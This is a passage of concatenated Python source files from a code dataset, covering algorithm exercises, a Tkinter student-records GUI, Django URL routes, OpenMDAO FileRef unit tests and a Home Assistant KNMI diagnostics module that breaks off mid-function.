Proszę oszacować złożoność czasową oraz\n# pamięciową użytego algorytmu.\n\n# Przyklad poprawnego przeksztalcenia.\n\n# 11 2\n# / \\ / \\\n# 3 13 3 5\n# / \\ / \\ \\\n# 2 7 11 7 13\n# /\n# 5\n\n#################### ROZW ZA 1 pkt\n\ndef ConvertTree(tree):\n\n def put_in_order(tree):\n\n if tree:\n put_in_order(tree.left) # dodajemy node'y do listy\n list.append(tree) # z posortowanymi wartosciami\n put_in_order(tree.right) # (wykorzystujemy wlasnosc BST)\n\n list = []\n\n put_in_order(tree)\n n = len(list)\n\n for i in range(n):\n list[i].left = list[2*i+1] if 2*i+1 < n else None # drzewo binarne\n list[i].right = list[2*i+2] if 2*i+2 < n else None\n list[i].parent = list[(i-1)//2] if i > 0 else None\n\n return list[0]\n\n#########################\n\nfrom zad1testy import runtests\n\nruntests(ConvertTree)","repo_name":"marcepanowyy/Algorithms-DataStructures","sub_path":"2020.2021/KP/I/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37675083778","text":"from tkinter import *\r\nimport tkinter.messagebox\r\nimport stddb\r\n\r\nclass Student:\r\n def __init__(self,root):\r\n self.root =root\r\n self.root.title(\"student database management system\")\r\n self.root.geometry(\"1350x750+0+0\")\r\n self.root.config(bg=\"cadet blue\")\r\n\r\n AdmissionNo=StringVar()\r\n StudentName=StringVar()\r\n Class=StringVar()\r\n DateOfBirth=StringVar()\r\n Age=StringVar()\r\n Gender=StringVar()\r\n Address=StringVar()\r\n ContactNo=StringVar()\r\n \r\n #============================Function=============================\r\n \r\n def iExit():\r\n iExit= tkinter.messagebox.askyesno(\"Students Database Management Systems\",\"Confirm if you want to exit\")\r\n if iExit > 0:\r\n root.destroy()\r\n return\r\n \r\n def clearData():\r\n self.txtAdmissionNo.delete(0,END)\r\n self.txtStudentName.delete(0,END)\r\n self.txtClass.delete(0,END)\r\n 
self.txtDateOfBirth.delete(0,END)\r\n self.txtAge.delete(0,END)\r\n self.txtGender.delete(0,END)\r\n self.txtAddress.delete(0,END)\r\n self.txtContactNo.delete(0,END)\r\n\r\n def addData():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.addStdRec(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get())\r\n studentlist.delete(0,END)\r\n studentlist.insert(END,(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get()))\r\n\r\n def DisplayData():\r\n studentlist.delete(0,END)\r\n for row in stddb.viewData():\r\n studentlist.insert(END,row,str(\"\"))\r\n\r\n def StudentRec(event):\r\n global sd\r\n searchStd = studentlist.curselection()[0]\r\n sd = studentlist.get(searchStd)\r\n\r\n self.txtAdmissionNo.delete(0,END)\r\n self.txtAdmissionNo.insert(END,sd[1])\r\n self.txtStudentName.delete(0,END)\r\n self.txtStudentName.insert(END,sd[2])\r\n self.txtClass.delete(0,END)\r\n self.txtClass.insert(END,sd[3])\r\n self.txtDateOfBirth.delete(0,END)\r\n self.txtDateOfBirth.insert(END,sd[4])\r\n self.txtAge.delete(0,END)\r\n self.txtAge.insert(END,sd[5])\r\n self.txtGender.delete(0,END)\r\n self.txtGender.insert(END,sd[6])\r\n self.txtAddress.delete(0,END)\r\n self.txtAddress.insert(END,sd[7])\r\n self.txtContactNo.delete(0,END)\r\n self.txtContactNo.insert(END,sd[8])\r\n\r\n def DeleteData():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.deleteRec(sd[0])\r\n clearData()\r\n DisplayData()\r\n\r\n def update():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.dataUpdate(sd[0],sd[1],sd[2],sd[3],sd[4],sd[5],sd[6],sd[7],sd[8])\r\n if(len(AdmissionNo.get())!=0):\r\n # stddb.addStdRec(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get())\r\n studentlist.delete(0,END)\r\n studentlist.insert(END,(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), 
Address.get(), ContactNo.get()))\r\n \r\n #============================Frames===============================\r\n \r\n MainFrame=Frame(self.root, bg=\"cadet blue\")\r\n MainFrame.grid()\r\n\r\n TitleFrame = Frame(MainFrame, bd=2,padx=54,pady=8,bg=\"Ghost White\", relief=RIDGE)\r\n TitleFrame.pack(side=TOP)\r\n\r\n self.lblTitleFrame= Label(TitleFrame, font=('arial',47,'bold'),text=\"Student Database Management System\",bg=\"Ghost White\")\r\n self.lblTitleFrame.grid()\r\n\r\n ButtomFrame = Frame(MainFrame, bd=2, width=1350,height=70, padx=18,pady=10,bg=\"Ghost White\", relief=RIDGE)\r\n ButtomFrame.pack(side=BOTTOM)\r\n\r\n DataFrame = Frame(MainFrame, bd=1, width=1300,height=400, padx=20,pady=20, relief=RIDGE,bg=\"cadet blue\")\r\n DataFrame.pack(side=BOTTOM)\r\n\r\n DataFrameLEFT = LabelFrame(DataFrame, bd=1, width=1000,height=600, padx=20, relief=RIDGE,bg=\"Ghost White\",\r\n font=('arial',20,'bold'),text=\"Student Info\\n\")\r\n DataFrameLEFT.pack(side=LEFT)\r\n\r\n DataFrameRIGHT = LabelFrame(DataFrame, bd=1, width=450,height=300, padx=31,pady=3, relief=RIDGE,bg=\"Ghost White\",\r\n font=('arial',20,'bold'),text=\"Student Details\\n\")\r\n DataFrameRIGHT.pack(side=RIGHT)\r\n \r\n #============================Labels and Entry Widget===============================\r\n \r\n self.lblAdmissionNo= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"AdmissionNo:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAdmissionNo.grid(row=0,column=0,stick=W)\r\n self.txtAdmissionNo= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=AdmissionNo,width=39)\r\n self.txtAdmissionNo.grid(row=0,column=1)\r\n\r\n self.lblStudentName= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"StudentName:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblStudentName.grid(row=1,column=0,stick=W)\r\n self.txtStudentName= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=StudentName,width=39)\r\n self.txtStudentName.grid(row=1,column=1)\r\n\r\n self.lblClass= 
Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Class:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblClass.grid(row=2,column=0,stick=W)\r\n self.txtClass= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Class,width=39)\r\n self.txtClass.grid(row=2,column=1)\r\n\r\n self.lblDateOfBirth= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"DateOfBirth:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblDateOfBirth.grid(row=3,column=0,stick=W)\r\n self.txtDateOfBirth= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=DateOfBirth,width=39)\r\n self.txtDateOfBirth.grid(row=3,column=1)\r\n\r\n self.lblAge= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Age:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAge.grid(row=4,column=0,stick=W)\r\n self.txtAge= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Age,width=39)\r\n self.txtAge.grid(row=4,column=1)\r\n\r\n self.lblGender= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Gender:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblGender.grid(row=5,column=0,stick=W)\r\n self.txtGender= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Gender,width=39)\r\n self.txtGender.grid(row=5,column=1)\r\n\r\n self.lblAddress= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Address:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAddress.grid(row=6,column=0,stick=W)\r\n self.txtAddress= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Address,width=39)\r\n self.txtAddress.grid(row=6,column=1)\r\n\r\n self.lblContactNo= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"ContactNo:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblContactNo.grid(row=7,column=0,stick=W)\r\n self.txtContactNo= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=ContactNo,width=39)\r\n self.txtContactNo.grid(row=7,column=1)\r\n\r\n #============================ListBox & ScrollBar Widget==================\r\n \r\n scrollbar = Scrollbar(DataFrameRIGHT)\r\n 
scrollbar.grid(row=0,column=1,sticky='ns')\r\n\r\n studentlist=Listbox(DataFrameRIGHT,width=41,height=16,font=('arial',12,'bold'),yscrollcommand=scrollbar.set)\r\n studentlist.bind('<>',StudentRec)\r\n studentlist.grid(row=0,column=0,padx=8)\r\n scrollbar.config(command= studentlist.yview)\r\n\r\n \r\n #============================Button Widget===============================\r\n \r\n self.btnAddDate = Button(ButtomFrame, text=\"Add New\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=addData)\r\n self.btnAddDate.grid(row=0,column=0)\r\n self.btnDisplayData = Button(ButtomFrame, text=\"Display\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=DisplayData)\r\n self.btnDisplayData.grid(row=0,column=1)\r\n self.btnClear = Button(ButtomFrame, text=\"Clear\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=clearData)\r\n self.btnClear.grid(row=0,column=2)\r\n self.btnDelete= Button(ButtomFrame, text=\"Delete\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=DeleteData)\r\n self.btnDelete.grid(row=0,column=3)\r\n self.btnUpdate = Button(ButtomFrame, text=\"Update\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=update)\r\n self.btnUpdate.grid(row=0,column=5)\r\n self.btnExit = Button(ButtomFrame, text=\"Exit\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=iExit)\r\n self.btnExit.grid(row=0,column=6)\r\n\r\nif __name__=='__main__':\r\n root = Tk()\r\n application = Student(root)\r\n root.mainloop()\r\n","repo_name":"rabina575/Student-DBMS","sub_path":"ip project.py","file_name":"ip project.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2828132535","text":"from itertools import product\n\n\nclass Solution:\n\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n def is_valid(self, x, y, n, m, grid):\n return 0 <= x < n and 0 <= y < m and grid[x][y] == '.'\n\n def check_move(self, cur, target, n, m, grid, box):\n q = list()\n 
q.append(cur)\n vis = set(q)\n if cur == target:\n return True\n while q:\n cur = q.pop(0)\n cur_x, cur_y = cur[0], cur[1]\n for i in range(4):\n new_x, new_y = cur_x + self.dx[i], cur_y + self.dy[i]\n pos = new_x, new_y\n # print(n, m, new_x, new_y)\n if 0 <= new_x < n and 0 <= new_y < m and (new_x, new_y) not in vis and grid[new_x][new_y] == '.' and pos != box:\n if pos == target:\n return True\n q.append((new_x, new_y))\n vis.add(pos)\n\n return False\n\n\n def minPushBox(self, grid):\n\n n, m = len(grid), len(grid[0])\n terminal, box, person = 0, 0, 0\n\n for i, j in product(range(n), range(m)):\n if grid[i][j] == 'T': terminal = i, j\n elif grid[i][j] == 'B': box = i, j\n elif grid[i][j] == 'S': person = i, j\n if grid[i][j] != '#': grid[i][j] = '.'\n\n q = list()\n q.append((box, person, 0))\n vis = set()\n while q:\n cur = q.pop(0)\n cur_box, cur_person, step = cur\n r, c = cur_box\n for i in range(4):\n new_x, new_y = r + self.dx[i], c + self.dy[i]\n next_box = new_x, new_y\n person_x, person_y = new_x - 2 * self.dx[i], new_y - 2 * self.dy[i]\n pre_person = person_x, person_y\n if(self.is_valid(new_x, new_y, n, m, grid) and self.is_valid(person_x, person_y, n, m, grid)\n and (next_box, i) not in vis and self.check_move(cur_person, pre_person, n, m, grid, cur_box)):\n if next_box == terminal:\n return step + 1\n q.append((next_box, pre_person, step + 1))\n vis.add((next_box, i))\n\n return -1","repo_name":"Minori-bot/ACM-Code","sub_path":"leetcode/contest/163/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41995858792","text":"# ------------------------------------------------------------------------------\n# Assignment 06, Question 1\n# ------------------------------------------------------------------------------\n\n# 1) Assignment 4: Factors\ndef factors(n):\n lofactors = []\n for i in range (1, n+1):\n if n % i == 0:\n 
lofactors.append(i)\n return lofactors\n \n \n# 2) Assignment 3: Third Character \ndef new_word(s):\n if len(s) < 3:\n return s\n else:\n char = s[2]\n newword = \"\"\n for c in s:\n if c == char:\n newword = newword + \"#\"\n else:\n newword = newword + c\n return newword[:2] + char + newword[3:]","repo_name":"catherinekdong/ibm-coursera","sub_path":"a06q1.py","file_name":"a06q1.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70770132292","text":"_ = input()\n\nrooms = input().split()\n\nstudents = []\n\nfor i in range(len(rooms)):\n\tstudents.append((int(rooms[i]), i + 1))\n\n\nstudents.sort(reverse=True)\n\ntotal = 0\n\nfor i in range(1, len(students)):\n\ttotal += students[i][0]\n\nif total < students[0][0]:\n\tprint(\"impossible\")\nelse:\n\tfor s, i in students:\n\t\tprint(str(i), end=' ')\n\tprint()\n\n","repo_name":"DaltonCole/ProgramingProblems","sub_path":"kattis/redistribution/tuple.py","file_name":"tuple.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33790234374","text":"from django.urls import path\n\nfrom .views import create_post, home, search_business, setup_profile, setup_business, biz_list, contact\n\n\nurlpatterns = [\n path('', home, name='home'),\n path('contact/', contact, name='contact'),\n path('setup-profile/', setup_profile, name='setup_profile'),\n path('setup-business/', setup_business, name='setup_business'),\n path('biz-list/', biz_list, name='biz_list'),\n path('search/', search_business, name='search_business'),\n path('create-post/', create_post, name='create_post'),\n\n]\n","repo_name":"davidkiama/NeighbourHood","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"24184655854","text":"\r\n# z<0 --> no access\r\n# z between 0 to 29 access with id 200 to 300\r\n# z between 30 to 50 access with id==name\r\nnam = input('Who are you')\r\nprint ('Welcome', nam)\r\n\r\nz=int(input(\"Your number\"))\r\nif z<0:\r\n print(\"you are not authorised to access\")\r\n\r\nelif z<30:\r\n b=int(input(\"enter your id\"))\r\n if b>200 & b<300:\r\n print(\"access granted\")\r\n else:\r\n print(\"sorry...no access\")\r\nelif z<50:\r\n c=input(\"Your your id\")\r\n if c==nam:\r\n print(\"access granted\")\r\n else:\r\n print(\"no authorisation found\")\r\nelse:\r\n print(\"You can close program you neither have no. nor id\")\r\n \r\n\r\n\r\n","repo_name":"jaychopra04/Python-Test","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72808552452","text":"\nimport os\nimport unittest\nimport struct\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nimport errno\n\nfrom openmdao.api import Problem, Component, Group, ExecComp, FileRef\nfrom openmdao.util.file_util import build_directory\n\nclass FileSrc(Component):\n def __init__(self, path=''):\n super(FileSrc, self).__init__()\n self.add_output(\"ascii_dat\", FileRef(os.path.join(path,\"ascii.dat\")))\n self.add_output(\"bin_dat\", FileRef(os.path.join(path,\"bin.dat\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n # generate the output files\n ascii_fref = unknowns['ascii_dat']\n with ascii_fref.open('w') as f:\n f.write(\"this is line 1\\nthis is line 2\")\n\n bin_fref = unknowns['bin_dat']\n with bin_fref.open('wb') as f:\n f.write(struct.pack('ddd', 3.14, 10.6, 123.456))\n\nclass FilePass(Component):\n def __init__(self, path=''):\n super(FilePass, self).__init__()\n self.add_param(\"ascii_in\", FileRef(os.path.join(path,\"ascii.dat\")))\n self.add_param(\"bin_in\", FileRef(os.path.join(path,\"bin.dat\")),\n 
binary=True)\n self.add_output(\"ascii_out\", FileRef(os.path.join(path,\"ascii.out\")))\n self.add_output(\"bin_out\", FileRef(os.path.join(path,\"bin.out\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n ascii_in_ref = params['ascii_in']\n bin_in_ref = params['bin_in']\n\n # read from input FileRefs\n with ascii_in_ref.open('r') as f:\n ascii_dat = f.read()\n\n with bin_in_ref.open('rb') as f:\n bin_dat = struct.unpack('ddd', f.read())\n\n # modify data\n ascii_dat += \"\\nthis is line 3\"\n bin_dat = list(bin_dat) + [-98.76]\n\n ascii_out_ref = unknowns['ascii_out']\n bin_out_ref = unknowns['bin_out']\n\n # write to output FileRefs\n with ascii_out_ref.open('w') as f:\n f.write(ascii_dat)\n\n with bin_out_ref.open('wb') as f:\n f.write(struct.pack('dddd', *bin_dat))\n\nclass FileSink(Component):\n def __init__(self, path=''):\n super(FileSink, self).__init__()\n self.add_param(\"ascii_in\", FileRef(os.path.join(path,\"ascii_final.dat\")))\n self.add_param(\"bin_in\", FileRef(os.path.join(path,\"bin_final.dat\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n pass # nothing to do\n\nclass FileBin(Component):\n def __init__(self):\n super(FileBin, self).__init__()\n self.add_output(\"fout\", FileRef(\"file.dat\"), binary=True)\n\nclass FileNoBin(Component):\n def __init__(self):\n super(FileNoBin, self).__init__()\n self.add_param(\"fin\", FileRef(\"file.dat\"))\n\n\n\nclass TestFileRef(unittest.TestCase):\n\n def setUp(self):\n self.startdir = os.getcwd()\n self.tmpdir = mkdtemp()\n os.chdir(self.tmpdir)\n\n def tearDown(self):\n os.chdir(self.startdir)\n try:\n rmtree(self.tmpdir)\n except OSError as e:\n # If directory already deleted, keep going\n if e.errno not in (errno.ENOENT, errno.EACCES, errno.EPERM):\n raise e\n\n def _compare_files(self, src, middle, sink):\n with src.unknowns['ascii_dat'].open('r') as f:\n src_ascii_dat = f.read()\n\n with src.unknowns['bin_dat'].open('r') as f:\n src_bin_dat = 
struct.unpack('ddd', f.read())\n\n with middle.params['ascii_in'].open('r') as f:\n middle_ascii_in = f.read()\n\n with middle.params['bin_in'].open('r') as f:\n middle_bin_dat = struct.unpack('ddd', f.read())\n\n with middle.unknowns['ascii_out'].open('r') as f:\n middle_ascii_out = f.read()\n\n with middle.unknowns['bin_out'].open('r') as f:\n middle_bin_out = struct.unpack('dddd', f.read())\n\n with sink.params['ascii_in'].open('r') as f:\n sink_ascii_in = f.read()\n\n with sink.params['bin_in'].open('rb') as f:\n sink_bin_in = struct.unpack('dddd', f.read())\n\n self.assertEqual(src_ascii_dat, \"this is line 1\\nthis is line 2\")\n self.assertEqual(src_bin_dat, (3.14, 10.6, 123.456))\n self.assertEqual(middle_ascii_in, src_ascii_dat)\n self.assertEqual(middle_bin_dat, src_bin_dat)\n self.assertEqual(middle_ascii_out, \"this is line 1\\nthis is line 2\\nthis is line 3\")\n self.assertEqual(middle_bin_out, (3.14, 10.6, 123.456, -98.76))\n self.assertEqual(sink_ascii_in, middle_ascii_out)\n self.assertEqual(sink_bin_in, middle_bin_out)\n\n def _build_model(self, path=''):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc(path=path))\n middle = root.add(\"middle\", FilePass(path=path))\n sink = root.add(\"sink\", FileSink(path=path))\n\n root.connect(\"src.ascii_dat\", \"middle.ascii_in\")\n root.connect(\"src.bin_dat\", \"middle.bin_in\")\n root.connect(\"middle.ascii_out\", \"sink.ascii_in\")\n root.connect(\"middle.bin_out\", \"sink.bin_in\")\n\n return p, src, middle, sink\n\n def test_same_dir(self):\n p, src, middle, sink = self._build_model()\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['ascii.dat', 'ascii.out',\n 'bin.dat', 'bin.out',\n 'ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs1(self):\n os.mkdir('src')\n os.mkdir('middle')\n os.mkdir('sink')\n\n p, src, middle, sink = 
self._build_model()\n\n src.directory = 'src'\n middle.directory = \"middle\"\n sink.directory = 'sink'\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files/directories\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['src', 'middle', 'sink']))\n files = set(os.listdir('src'))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat']))\n files = set(os.listdir('middle'))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat', 'ascii.out', 'bin.out']))\n files = set(os.listdir('sink'))\n self.assertEqual(files, set(['ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs2(self):\n # dirs introduced via system.directory and in FileRef path attrs\n\n p, src, middle, sink = self._build_model(path='nest')\n\n src.directory = 'src'\n src.create_dirs = True\n middle.directory = \"middle\"\n middle.create_dirs = True\n sink.directory = 'sink'\n sink.create_dirs = True\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files/directories\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['src', 'middle', 'sink']))\n\n files = set(os.listdir('src'))\n self.assertEqual(files, set(['nest']))\n files = set(os.listdir('middle'))\n self.assertEqual(files, set(['nest']))\n files = set(os.listdir('sink'))\n self.assertEqual(files, set(['nest']))\n\n files = set(os.listdir(os.path.join('src', 'nest')))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat']))\n files = set(os.listdir(os.path.join('middle', 'nest')))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat', 'ascii.out', 'bin.out']))\n files = set(os.listdir(os.path.join('sink', 'nest')))\n self.assertEqual(files, set(['ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs3(self):\n # dirs introduced via system.directory and in FileRef path attrs but\n # create_dirs is not set\n\n p, src, middle, sink = self._build_model(path='nest')\n\n src.directory = 'src'\n middle.directory = 
\"middle\"\n sink.directory = 'sink'\n\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertEqual(str(err).replace('/private',''), \"directory '%s' doesn't \"\n \"exist for FileRef('%s'). Set \"\n \"create_dirs=True in system 'src' to create the \"\n \"directory automatically.\" %\n (os.path.join(self.tmpdir,'src','nest'),\n os.path.join('nest','ascii.dat')))\n else:\n self.fail(\"Exception expected\")\n\n def test_mismatch(self):\n p = Problem(root=Group())\n root = p.root\n binsys = root.add(\"binsys\", FileBin())\n nobinsys = root.add(\"nobinsys\", FileNoBin())\n root.connect('binsys.fout', 'nobinsys.fin')\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertEqual(str(err), \"Source FileRef has (binary=True) and dest has (binary=False).\")\n else:\n self.fail(\"Exception expected\")\n\n def test_ref_unconnected(self):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc())\n sink = root.add(\"sink\", FileSink())\n sink2 = root.add(\"sink2\", FileSink())\n\n root.connect(\"src.ascii_dat\", \"sink.ascii_in\")\n\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertTrue(\"FileRef param 'sink2.ascii_in' is unconnected but will \"\n \"be overwritten by the following FileRef unknown(s): \"\n \"['src.ascii_dat']. Files referred to by the FileRef unknowns are: \"\n \"['%s']. 
To remove this error, make a \"\n \"connection between sink2.ascii_in and a FileRef unknown.\" %\n os.path.join(self.tmpdir, 'ascii.dat') in str(err).replace('\\\\\\\\','\\\\').replace('/private',''), )\n else:\n self.fail(\"Exception expected\")\n\n def test_ref_multi_connections(self):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc())\n src2 = root.add(\"src2\", FileSrc())\n sink = root.add(\"sink\", FileSink())\n sink2 = root.add(\"sink2\", FileSink())\n\n root.connect(\"src.ascii_dat\", \"sink.ascii_in\")\n root.connect(\"src2.ascii_dat\", \"sink2.ascii_in\")\n\n try:\n p.setup(check=False)\n except Exception as err:\n # osx tacks a /private to the beginning of the tmp pathname, resulting\n # in test diffs, so just get rid of it\n msg = \"Input file '%s' is referenced from FileRef param(s) ['sink.ascii_in', \" \\\n \"'sink2.ascii_in'], which are connected to multiple output \" \\\n \"FileRefs: ['src.ascii_dat', 'src2.ascii_dat']. Those FileRefs \" \\\n \"reference the following files: %s.\" % (\n os.path.join(self.tmpdir, 'ascii_final.dat'),\n [os.path.join(self.tmpdir, 'ascii.dat'),\n os.path.join(self.tmpdir, 'ascii.dat')])\n self.assertTrue(msg in str(err).replace('/private',''))\n else:\n self.fail(\"Exception expected\")\n\nclass FileComp(Component):\n def __init__(self, *args, **kwargs):\n super(FileComp, self).__init__(*args, **kwargs)\n self.add_output(\"out\", 0.0)\n\n def solve_nonlinear(self, params, unknowns, resids):\n with open(self.name+\".in\", 'r') as f:\n unknowns['out'] = float(f.read())\n\n\nclass TestDirectory(unittest.TestCase):\n\n def setUp(self):\n self.startdir = os.getcwd()\n self.tmpdir = mkdtemp()\n os.chdir(self.tmpdir)\n build_directory({\n 'top': {\n 'nest1': {\n 'c1.in': '3.14'\n },\n 'c2.in': '5.0'\n }\n })\n\n def tearDown(self):\n os.chdir(self.startdir)\n try:\n rmtree(self.tmpdir)\n except OSError as e:\n # If directory already deleted, keep going\n if e.errno not in (errno.ENOENT, 
errno.EACCES, errno.EPERM):\n raise e\n\n def test_sysdirs(self):\n p = Problem(root=Group())\n p.root.directory = 'top'\n nest1 = p.root.add('nest1', Group())\n nest1.directory = 'nest1'\n nest1.add('c1', FileComp())\n nest2 = p.root.add('nest2', Group())\n nest2.add('c2', FileComp())\n p.setup(check=False)\n p.run()\n self.assertEqual(p['nest1.c1.out'], 3.14)\n self.assertEqual(p['nest2.c2.out'], 5.0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"OpenMDAO/OpenMDAO1","sub_path":"openmdao/core/test/test_fileref.py","file_name":"test_fileref.py","file_ext":"py","file_size_in_byte":12815,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"44"} +{"seq_id":"72288495492","text":"class Solution(object):\n def helper(self, dic, li, l):\n if l == 0:\n self.ret.append(li + li[::-1])\n elif l == 1:\n for k in dic:\n if dic[k] == 1: self.ret.append(li + [k] + li[::-1])\n else:\n for k in dic:\n if dic[k] >= 2:\n dic[k] -= 2\n self.helper(dic, li+[k], l-2)\n dic[k] += 2\n\n def generatePalindromes(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n l = len(s)\n dic = collections.defaultdict(int)\n for i in s: dic[i] += 1\n odd = False\n for k,v in dic.iteritems():\n if v%2 == 1:\n if odd:\n return []\n else:\n odd = True\n self.ret = []\n self.helper(dic, [], l)\n res = []\n for r in self.ret: res.append(\"\".join(r))\n return res","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/267-Palindrome-Permutation-II/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3475663872","text":"\"\"\"KNMI Diagnostics Support.\"\"\"\n# diagnostics.py\n\nimport asyncio\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE\nfrom homeassistant.core import HomeAssistant\n\nfrom . 
import DOMAIN, KnmiDataUpdateCoordinator\n\nTO_REDACT = {CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE}\n\n\nclass KnmiDiagnostics:\n def __init__(self, hass: HomeAssistant) -> None:\n \"\"\"Initialize KNMI Diagnostics support.\"\"\"\n self.hass = hass\n self.coordinator_cache = self.hass.data[DOMAIN]\n\n async def get_config_entry_diagnostics(\n self, config_entry: ConfigEntry\n ) -> dict:\n \"\"\"Return diagnostics for a config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to get diagnostics for.\n\n Returns:\n dict: A dictionary containing the diagnostics information.\n \"\"\"\n self._validate_config_entry(config_entry)\n coordinator = self._get_coordinator(config_entry)\n data = await self._get_coordinator_data(coordinator)\n\n redacted_config_entry = {\n k: v for k, v in config_entry.as_dict().items() if k not in TO_REDACT\n }\n\n return {\n \"config_entry\": redacted_config_entry,\n \"data\": data,\n }\n\n def _validate_config_entry(self, config_entry: ConfigEntry) -> None:\n \"\"\"Validate if the input is a valid ConfigEntry instance.\n\n Args:\n config_entry (ConfigEntry): The config entry to validate.\n\n Raises:\n TypeError: If config_entry is not a ConfigEntry instance.\n \"\"\"\n if not isinstance(config_entry, ConfigEntry):\n raise TypeError(\"config_entry should be a ConfigEntry instance\")\n\n def _get_coordinator(self, config_entry: ConfigEntry) -> KnmiDataUpdateCoordinator:\n \"\"\"Retrieve the coordinator for the given config entry.\n\n Args:\n config_entry (ConfigEntry): The config entry to get the coordinator for.\n\n Returns:\n KnmiDataUpdateCoordinator: The coordinator associated with the config entry.\n \"\"\"\n return self.coordinator_cache.get(config_entry.entry_id)\n\n async def _get_coordinator_data(\n self, coordinator: KnmiDataUpdateCoordinator\n ) -> dict:\n \"\"\"Retrieve data from the coordinator, or return an empty dictionary if it's None.\n\n Args:\n coordinator (KnmiDataUpdateCoordinator): The coordinator to get 
